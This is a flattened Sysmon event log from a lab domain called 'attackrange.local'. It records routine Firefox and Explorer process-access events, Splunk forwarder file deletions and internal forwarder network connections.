Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\permissions.sqlite-journalMD5=FB02AC3D8A8C7B0258E7BB05D63969A0,SHA256=DCBD27F3C8658F880EFD4A5E01816FDC7EF21F0CCD499E8BE0FA66AE45D22B3C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000150073Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:24.702{39BD8DE3-0FD9-60CA-8B00-00000000D101}19886584C:\Windows\Explorer.EXE{39BD8DE3-131D-60CA-0B01-00000000D101}1192C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150072Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:24.682{39BD8DE3-0FD9-60CA-8B00-00000000D101}19883004C:\Windows\Explorer.EXE{39BD8DE3-131D-60CA-0B01-00000000D101}1192C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62250|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150071Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:24.682{39BD8DE3-0FD9-60CA-8B00-00000000D101}19883004C:\Windows\Explorer.EXE{39BD8DE3-131D-60CA-0B01-00000000D101}1192C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d2c9|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000104639Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:25.685{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=875577D66FF31A5106E3E81BE18446C0,SHA256=3EA40BF6CCF442C058BFC9BD56240F5DAF092E902C6675315E0F5DE45E6F679D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104638Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:25.685{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=71E487F7CD78A111912647526EBC0804,SHA256=E0C78D84D9CDA74BEF731C0F882B8159B029DE23B01813B0CCA470EDFC31D6D0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150082Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:25.835{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=42B7377D9439AB1F74854CDE92054050,SHA256=B715981198BA540CCB10FFE4F259A36EF7F531238B4A8143576D2B07682278AB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000150081Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:25.799{39BD8DE3-131D-60CA-0B01-00000000D101}11921152C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3ecf51|C:\Program Files\Mozilla Firefox\xul.dll+16a060f|C:\Program Files\Mozilla Firefox\xul.dll+68a670|C:\Program Files\Mozilla Firefox\xul.dll+179b3f2|C:\Program Files\Mozilla Firefox\xul.dll+179b324|C:\Program Files\Mozilla Firefox\xul.dll+6878f8|C:\Program Files\Mozilla Firefox\xul.dll+1797c17|C:\Program Files\Mozilla Firefox\xul.dll+17a1ea8|C:\Program Files\Mozilla Firefox\xul.dll+1795f16|C:\Program Files\Mozilla Firefox\xul.dll+17963f3|C:\Program Files\Mozilla Firefox\xul.dll+2ff7916|C:\Program Files\Mozilla Firefox\xul.dll+64a53d|C:\Program Files\Mozilla Firefox\xul.dll+640992|C:\Program Files\Mozilla Firefox\xul.dll+2bbbae1|C:\Program Files\Mozilla Firefox\xul.dll+2bbad50|C:\Program Files\Mozilla Firefox\xul.dll+61e011|C:\Program Files\Mozilla Firefox\xul.dll+2d7a6fa|C:\Program Files\Mozilla Firefox\xul.dll+2d85d07|C:\Program Files\Mozilla Firefox\xul.dll+da5ebb|C:\Program Files\Mozilla Firefox\xul.dll+4025f|C:\Program Files\Mozilla Firefox\xul.dll+1230b8e|C:\Program Files\Mozilla Firefox\xul.dll+12092bf 10341000x8000000000000000150080Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:25.798{39BD8DE3-131D-60CA-0B01-00000000D101}11921152C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3ecf51|C:\Program Files\Mozilla Firefox\xul.dll+1203781|C:\Program Files\Mozilla Firefox\xul.dll+1234ce9|C:\Program Files\Mozilla Firefox\xul.dll+1234c09|C:\Program Files\Mozilla Firefox\xul.dll+12323e0|C:\Program Files\Mozilla Firefox\xul.dll+12328f4|C:\Program Files\Mozilla Firefox\xul.dll+16ba421|C:\Program Files\Mozilla Firefox\xul.dll+689569|C:\Program Files\Mozilla Firefox\xul.dll+689474|C:\Program Files\Mozilla Firefox\xul.dll+68925d|C:\Program Files\Mozilla Firefox\xul.dll+688e64|C:\Program Files\Mozilla Firefox\xul.dll+179b3d3|C:\Program Files\Mozilla Firefox\xul.dll+179b324|C:\Program Files\Mozilla Firefox\xul.dll+6878f8|C:\Program Files\Mozilla Firefox\xul.dll+1797c17|C:\Program Files\Mozilla Firefox\xul.dll+17a1ea8|C:\Program Files\Mozilla Firefox\xul.dll+1795f16|C:\Program Files\Mozilla Firefox\xul.dll+17963f3|C:\Program Files\Mozilla Firefox\xul.dll+2ff7916|C:\Program Files\Mozilla Firefox\xul.dll+64a53d|C:\Program Files\Mozilla Firefox\xul.dll+640992|C:\Program Files\Mozilla Firefox\xul.dll+2bbbae1 10341000x8000000000000000150079Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:25.782{39BD8DE3-131D-60CA-0B01-00000000D101}11921152C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3ecf51|C:\Program Files\Mozilla Firefox\xul.dll+16a060f|C:\Program Files\Mozilla Firefox\xul.dll+68a670|C:\Program Files\Mozilla Firefox\xul.dll+179b3f2|C:\Program Files\Mozilla Firefox\xul.dll+179b324|C:\Program Files\Mozilla Firefox\xul.dll+6878f8|C:\Program Files\Mozilla Firefox\xul.dll+1797c17|C:\Program Files\Mozilla Firefox\xul.dll+17a1ea8|C:\Program Files\Mozilla Firefox\xul.dll+17a1ea8|C:\Program Files\Mozilla Firefox\xul.dll+17a1ea8|C:\Program Files\Mozilla Firefox\xul.dll+17a1ea8|C:\Program Files\Mozilla Firefox\xul.dll+1795f16|C:\Program Files\Mozilla Firefox\xul.dll+17963f3|C:\Program Files\Mozilla Firefox\xul.dll+2ff7916|C:\Program Files\Mozilla Firefox\xul.dll+64a53d|C:\Program Files\Mozilla Firefox\xul.dll+640992|C:\Program Files\Mozilla Firefox\xul.dll+2bbbae1|C:\Program Files\Mozilla Firefox\xul.dll+2bbad50|C:\Program Files\Mozilla Firefox\xul.dll+61e011|C:\Program Files\Mozilla Firefox\xul.dll+2d7a6fa|C:\Program Files\Mozilla Firefox\xul.dll+2d85d07|C:\Program Files\Mozilla Firefox\xul.dll+da5ebb 10341000x8000000000000000150078Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:25.782{39BD8DE3-131D-60CA-0B01-00000000D101}11921152C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3ecf51|C:\Program Files\Mozilla Firefox\xul.dll+1203781|C:\Program Files\Mozilla Firefox\xul.dll+1234ce9|C:\Program Files\Mozilla Firefox\xul.dll+1234c09|C:\Program Files\Mozilla Firefox\xul.dll+12323e0|C:\Program Files\Mozilla Firefox\xul.dll+12328f4|C:\Program Files\Mozilla Firefox\xul.dll+16ba421|C:\Program Files\Mozilla Firefox\xul.dll+689569|C:\Program Files\Mozilla Firefox\xul.dll+689474|C:\Program Files\Mozilla Firefox\xul.dll+68925d|C:\Program Files\Mozilla Firefox\xul.dll+688e64|C:\Program Files\Mozilla Firefox\xul.dll+179b3d3|C:\Program Files\Mozilla Firefox\xul.dll+179b324|C:\Program Files\Mozilla Firefox\xul.dll+6878f8|C:\Program Files\Mozilla Firefox\xul.dll+1797c17|C:\Program Files\Mozilla Firefox\xul.dll+17a1ea8|C:\Program Files\Mozilla Firefox\xul.dll+17a1ea8|C:\Program Files\Mozilla Firefox\xul.dll+17a1ea8|C:\Program Files\Mozilla Firefox\xul.dll+17a1ea8|C:\Program Files\Mozilla Firefox\xul.dll+1795f16|C:\Program Files\Mozilla Firefox\xul.dll+17963f3|C:\Program Files\Mozilla Firefox\xul.dll+2ff7916 354300x8000000000000000150077Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:23.955{39BD8DE3-4818-60CA-2408-00000000D101}4064C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-14.attackrange.local58362-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000150076Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:25.151{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=87D005FB1E22381E9903F0CB72FABFE3,SHA256=FD5A676F1E2EEA24D63442F6F70A6229355B1DA1599023E5889EAAD265BED46C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150084Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:26.835{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A126B937734D4088D2ADF65514519D60,SHA256=2CE55466F194F1251E3976DFA372F0A6692AA49A8E2367C65AB4ABF68C9EB5AA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150083Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:26.566{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EDCCEB6A951921A259B3531716D2EF31,SHA256=0779113EB335025449DD9B4FEFC5D1FC0140916C10DCF162B362D294472281B8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104640Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:27.590{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D5524AF18373CEB34EDFC1A3338A0F21,SHA256=98D1A2792795172783C73E84D3B137E1B1C2408652A4B503C5A28D77019B91C6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150087Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:27.850{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2317FC0F18D33A8287D87946EC5C9A3B,SHA256=34F64DEFBACB535CDAB73BFE33596995A78B7059710E07D641A6DF0930E96F60,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000150086Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:27.419{39BD8DE3-131D-60CA-0B01-00000000D101}11926820C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+2cf80|C:\Program Files\Mozilla Firefox\firefox.exe+2cad3|C:\Program Files\Mozilla Firefox\firefox.exe+40de0|C:\Program Files\Mozilla Firefox\firefox.exe+40adc|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000150085Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:27.004{39BD8DE3-131D-60CA-0B01-00000000D101}11926820C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+2cf80|C:\Program Files\Mozilla Firefox\firefox.exe+2cad3|C:\Program Files\Mozilla Firefox\firefox.exe+40de0|C:\Program Files\Mozilla Firefox\firefox.exe+40adc|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000104641Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:28.988{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=38CC877CEF98EC1706A38388ADD42FC1,SHA256=8ADDAF069207DF69455C97B50B729B01DE8D0287EEEB43565E4FEEBD6A3B9A0A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000150088Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:28.865{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8CDBC2D1DD88C7888AC5D30C0D2DEE51,SHA256=A09DD07BC1BE1DF4F51ADC626EBA021C39B1180F25F794BAD5B1B98B87787BE4,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000104642Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:27.711{54715871-FD33-60C9-6D00-00000000CF01}3756C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-681.attackrange.local55394-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 10341000x8000000000000000150095Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:29.933{39BD8DE3-131D-60CA-0B01-00000000D101}11921152C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3ecf51|C:\Program Files\Mozilla Firefox\xul.dll+16a060f|C:\Program Files\Mozilla Firefox\xul.dll+68a670|C:\Program Files\Mozilla Firefox\xul.dll+179b3f2|C:\Program Files\Mozilla Firefox\xul.dll+179b324|C:\Program Files\Mozilla Firefox\xul.dll+6878f8|C:\Program Files\Mozilla Firefox\xul.dll+1797c17|C:\Program Files\Mozilla Firefox\xul.dll+17a1ea8|C:\Program Files\Mozilla Firefox\xul.dll+17a1ea8|C:\Program Files\Mozilla Firefox\xul.dll+17a1ea8|C:\Program Files\Mozilla Firefox\xul.dll+17a1ea8|C:\Program Files\Mozilla Firefox\xul.dll+1795f16|C:\Program Files\Mozilla Firefox\xul.dll+17963f3|C:\Program Files\Mozilla Firefox\xul.dll+2ff7916|C:\Program Files\Mozilla Firefox\xul.dll+64a53d|C:\Program Files\Mozilla Firefox\xul.dll+640992|C:\Program Files\Mozilla Firefox\xul.dll+2bbbae1|C:\Program Files\Mozilla Firefox\xul.dll+2bbad50|C:\Program Files\Mozilla Firefox\xul.dll+61e011|C:\Program Files\Mozilla Firefox\xul.dll+2d7a6fa|C:\Program Files\Mozilla Firefox\xul.dll+2d7f900|C:\Program Files\Mozilla Firefox\xul.dll+2d7f775 10341000x8000000000000000150094Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:29.933{39BD8DE3-131D-60CA-0B01-00000000D101}11921152C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3ecf51|C:\Program Files\Mozilla Firefox\xul.dll+1203781|C:\Program Files\Mozilla Firefox\xul.dll+1234ce9|C:\Program Files\Mozilla Firefox\xul.dll+1234c09|C:\Program Files\Mozilla Firefox\xul.dll+12323e0|C:\Program Files\Mozilla Firefox\xul.dll+12328f4|C:\Program Files\Mozilla Firefox\xul.dll+16ba421|C:\Program Files\Mozilla Firefox\xul.dll+689569|C:\Program Files\Mozilla Firefox\xul.dll+689474|C:\Program Files\Mozilla Firefox\xul.dll+68925d|C:\Program Files\Mozilla Firefox\xul.dll+688e64|C:\Program Files\Mozilla Firefox\xul.dll+179b3d3|C:\Program Files\Mozilla Firefox\xul.dll+179b324|C:\Program Files\Mozilla Firefox\xul.dll+6878f8|C:\Program Files\Mozilla Firefox\xul.dll+1797c17|C:\Program Files\Mozilla Firefox\xul.dll+17a1ea8|C:\Program Files\Mozilla Firefox\xul.dll+17a1ea8|C:\Program Files\Mozilla Firefox\xul.dll+17a1ea8|C:\Program Files\Mozilla Firefox\xul.dll+17a1ea8|C:\Program Files\Mozilla Firefox\xul.dll+1795f16|C:\Program Files\Mozilla Firefox\xul.dll+17963f3|C:\Program Files\Mozilla Firefox\xul.dll+2ff7916 10341000x8000000000000000150093Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:29.933{39BD8DE3-131D-60CA-0B01-00000000D101}11921152C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3ecf51|C:\Program Files\Mozilla Firefox\xul.dll+16a060f|C:\Program Files\Mozilla Firefox\xul.dll+68a670|C:\Program Files\Mozilla Firefox\xul.dll+179b3f2|C:\Program Files\Mozilla Firefox\xul.dll+179b324|C:\Program Files\Mozilla Firefox\xul.dll+6878f8|C:\Program Files\Mozilla Firefox\xul.dll+1797c17|C:\Program Files\Mozilla Firefox\xul.dll+17a1ea8|C:\Program Files\Mozilla Firefox\xul.dll+1795f16|C:\Program Files\Mozilla Firefox\xul.dll+17963f3|C:\Program Files\Mozilla Firefox\xul.dll+2ff7916|C:\Program Files\Mozilla Firefox\xul.dll+64a53d|C:\Program Files\Mozilla Firefox\xul.dll+640992|C:\Program Files\Mozilla Firefox\xul.dll+2bbbae1|C:\Program Files\Mozilla Firefox\xul.dll+2bbad50|C:\Program Files\Mozilla Firefox\xul.dll+61e011|C:\Program Files\Mozilla Firefox\xul.dll+2d7a6fa|C:\Program Files\Mozilla Firefox\xul.dll+2d7f900|C:\Program Files\Mozilla Firefox\xul.dll+2d7f775|C:\Program Files\Mozilla Firefox\xul.dll+2d7f2f7|C:\Program Files\Mozilla Firefox\xul.dll+2d7edba|C:\Program Files\Mozilla Firefox\xul.dll+2d7fa7f 10341000x8000000000000000150092Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:29.933{39BD8DE3-131D-60CA-0B01-00000000D101}11921152C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3ecf51|C:\Program Files\Mozilla Firefox\xul.dll+1203781|C:\Program Files\Mozilla Firefox\xul.dll+1234ce9|C:\Program Files\Mozilla Firefox\xul.dll+1234c09|C:\Program Files\Mozilla Firefox\xul.dll+12323e0|C:\Program Files\Mozilla Firefox\xul.dll+12328f4|C:\Program Files\Mozilla Firefox\xul.dll+16ba421|C:\Program Files\Mozilla Firefox\xul.dll+689569|C:\Program Files\Mozilla Firefox\xul.dll+689474|C:\Program Files\Mozilla Firefox\xul.dll+68925d|C:\Program Files\Mozilla Firefox\xul.dll+688e64|C:\Program Files\Mozilla Firefox\xul.dll+179b3d3|C:\Program Files\Mozilla Firefox\xul.dll+179b324|C:\Program Files\Mozilla Firefox\xul.dll+6878f8|C:\Program Files\Mozilla Firefox\xul.dll+1797c17|C:\Program Files\Mozilla Firefox\xul.dll+17a1ea8|C:\Program Files\Mozilla Firefox\xul.dll+1795f16|C:\Program Files\Mozilla Firefox\xul.dll+17963f3|C:\Program Files\Mozilla Firefox\xul.dll+2ff7916|C:\Program Files\Mozilla Firefox\xul.dll+64a53d|C:\Program Files\Mozilla Firefox\xul.dll+640992|C:\Program Files\Mozilla Firefox\xul.dll+2bbbae1 23542300x8000000000000000150091Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:29.880{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7EC23FA651FA7CBBAAC060EB8B5F6D68,SHA256=F8B8AA28032A7593F7AA140CD8F13A99D591011CB5B8A5BF5189B51FE466F696,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000150090Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:29.219{39BD8DE3-131D-60CA-0B01-00000000D101}11921152C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3ecf51|C:\Program Files\Mozilla Firefox\xul.dll+16a060f|C:\Program Files\Mozilla Firefox\xul.dll+68a670|C:\Program Files\Mozilla Firefox\xul.dll+179b3f2|C:\Program Files\Mozilla Firefox\xul.dll+179b324|C:\Program Files\Mozilla Firefox\xul.dll+6878f8|C:\Program Files\Mozilla Firefox\xul.dll+1797c17|C:\Program Files\Mozilla Firefox\xul.dll+17a1ea8|C:\Program Files\Mozilla Firefox\xul.dll+1795f16|C:\Program Files\Mozilla Firefox\xul.dll+17963f3|C:\Program Files\Mozilla Firefox\xul.dll+2ff7916|C:\Program Files\Mozilla Firefox\xul.dll+64a53d|C:\Program Files\Mozilla Firefox\xul.dll+640992|C:\Program Files\Mozilla Firefox\xul.dll+2bbbae1|C:\Program Files\Mozilla Firefox\xul.dll+2bbad50|C:\Program Files\Mozilla Firefox\xul.dll+61e011|C:\Program Files\Mozilla Firefox\xul.dll+2d7a6fa|C:\Program Files\Mozilla Firefox\xul.dll+2d85d07|C:\Program Files\Mozilla Firefox\xul.dll+da5ebb|C:\Program Files\Mozilla Firefox\xul.dll+4025f|C:\Program Files\Mozilla Firefox\xul.dll+1230b8e|C:\Program Files\Mozilla Firefox\xul.dll+12092bf 10341000x8000000000000000150089Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:29.219{39BD8DE3-131D-60CA-0B01-00000000D101}11921152C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3ecf51|C:\Program Files\Mozilla Firefox\xul.dll+1203781|C:\Program Files\Mozilla Firefox\xul.dll+1234ce9|C:\Program Files\Mozilla Firefox\xul.dll+1234c09|C:\Program Files\Mozilla Firefox\xul.dll+12323e0|C:\Program Files\Mozilla Firefox\xul.dll+12328f4|C:\Program Files\Mozilla Firefox\xul.dll+16ba421|C:\Program Files\Mozilla Firefox\xul.dll+689569|C:\Program Files\Mozilla Firefox\xul.dll+689474|C:\Program Files\Mozilla Firefox\xul.dll+68925d|C:\Program Files\Mozilla Firefox\xul.dll+688e64|C:\Program Files\Mozilla Firefox\xul.dll+179b3d3|C:\Program Files\Mozilla Firefox\xul.dll+179b324|C:\Program Files\Mozilla Firefox\xul.dll+6878f8|C:\Program Files\Mozilla Firefox\xul.dll+1797c17|C:\Program Files\Mozilla Firefox\xul.dll+17a1ea8|C:\Program Files\Mozilla Firefox\xul.dll+1795f16|C:\Program Files\Mozilla Firefox\xul.dll+17963f3|C:\Program Files\Mozilla Firefox\xul.dll+2ff7916|C:\Program Files\Mozilla Firefox\xul.dll+64a53d|C:\Program Files\Mozilla Firefox\xul.dll+640992|C:\Program Files\Mozilla Firefox\xul.dll+2bbbae1 23542300x8000000000000000104643Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:30.357{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4209F0222261F68C20F4D44E6E4848F8,SHA256=2E11D5AABC00342BEE5606756A7A5241FFF0151BC6438BC78A1C1D922C2BB559,IMPHASH=00000000000000000000000000000000falsetrue 